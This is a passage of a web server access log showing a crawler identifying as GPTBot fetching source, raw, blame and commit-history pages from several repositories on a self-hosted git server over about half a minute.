(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 45869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 12754] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" +[17/Feb/2026:13:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 10833] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" +[17/Feb/2026:13:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 13427] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" +[17/Feb/2026:13:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23928] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" +[17/Feb/2026:13:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" +[17/Feb/2026:13:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" [Client 74.7.227.38] [Length 19733] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" +[17/Feb/2026:13:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" [Client 74.7.227.38] [Length 10259] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" +[17/Feb/2026:13:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 15793] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" +[17/Feb/2026:13:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 14301] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" +[17/Feb/2026:13:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10501] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" +[17/Feb/2026:13:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 14870] [Gzip 9.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 259718] [Gzip 13.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 15450] [Gzip 8.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" +[17/Feb/2026:13:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" [Client 74.7.227.38] [Length 22470] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" +[17/Feb/2026:13:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" +[17/Feb/2026:13:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 18148] [Gzip 12.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" +[17/Feb/2026:13:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" +[17/Feb/2026:13:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" +[17/Feb/2026:13:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" +[17/Feb/2026:13:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" +[17/Feb/2026:13:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" [Client 74.7.227.38] [Length 9903] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" +[17/Feb/2026:13:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" +[17/Feb/2026:13:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71400] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" +[17/Feb/2026:13:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 22879] [Gzip 13.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" +[17/Feb/2026:13:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10396] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" +[17/Feb/2026:13:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject" [Client 74.7.227.38] [Length 10719] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" +[17/Feb/2026:13:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 10903] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" +[17/Feb/2026:13:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 10902] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" +[17/Feb/2026:13:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" +[17/Feb/2026:13:59:29 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" +[17/Feb/2026:13:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" +[17/Feb/2026:13:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" [Client 74.7.227.38] [Length 10723] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" +[17/Feb/2026:13:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" +[17/Feb/2026:13:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" +[17/Feb/2026:13:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" [Client 74.7.227.38] [Length 11646] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:13:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" [Client 74.7.227.38] [Length 11639] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" +[17/Feb/2026:13:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject" +[17/Feb/2026:13:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10163] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject" +[17/Feb/2026:13:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11112] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject" +[17/Feb/2026:13:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr 